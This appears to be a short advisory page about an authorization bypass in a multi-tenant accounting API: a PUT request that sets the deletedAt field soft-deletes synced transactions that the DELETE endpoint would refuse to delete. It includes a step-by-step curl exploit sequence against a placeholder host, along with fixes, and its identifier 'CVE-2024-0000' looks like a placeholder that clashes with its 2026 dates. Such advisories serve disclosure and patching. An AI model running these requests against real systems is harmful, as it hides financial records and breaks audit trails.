Transaction Integrity Flaw, Authorization Bypass, CVE-2024-0000 (Medium)

Listen to this Post

How the mentioned CVE works:

The vulnerability exists because the PUT update endpoint accepts a client-controlled full Transaction object, including the `deletedAt` field, while the DELETE endpoint correctly rejects deletion of synced transactions on non-manual links. An authenticated tenant user can bypass the intended immutability policy by sending a PUT request that sets `deletedAt` to a valid timestamp. The server fails to protect this server-managed field, allowing the transaction to be soft-deleted. After the update, the transaction disappears from normal list views but remains retrievable via direct GET by ID. The root cause is trusting client input for sensitive fields and inconsistent enforcement of deletion logic across HTTP methods. The attack requires no special privileges beyond being an authenticated user with access to a synced transaction within the same tenant. This is not a UI bug but a server-side integrity and authorization flaw.

dailycve form:

Platform: Multi-tenant accounting
Version: Unspecified
Vulnerability: Soft-delete bypass
Severity: Medium
date: 2026-04-09

Prediction: 2026-04-30

What Undercode Say:

Simulate listing synced transactions (pre-exploit)
curl -X GET "https://target/api/transactions?sync=true" -H "Authorization: Bearer $TOKEN"
Confirm DELETE is blocked
curl -X DELETE "https://target/api/transactions/123" -H "Authorization: Bearer $TOKEN"
Expected: 403 error "cannot delete synced non-manual transaction"
Exploit via PUT with deletedAt
curl -X PUT "https://target/api/transactions/123" -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" -d '{"id":123,"deletedAt":"2026-04-09T10:00:00Z"}'
Verify disappearance from list
curl -X GET "https://target/api/transactions?sync=true" -H "Authorization: Bearer $TOKEN"
Transaction no longer appears
Direct fetch still shows soft-deleted record
curl -X GET "https://target/api/transactions/123" -H "Authorization: Bearer $TOKEN"

Exploit:

Send PUT with `deletedAt` to any synced transaction on non-manual link after authentication.

Protection from this CVE:

Reject `deletedAt` in PUT updates; enforce server-side field whitelist; unify deletion policy across DELETE and PUT.

Impact:

Hidden imported transactions, broken audit trails, undermined bookkeeping integrity.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top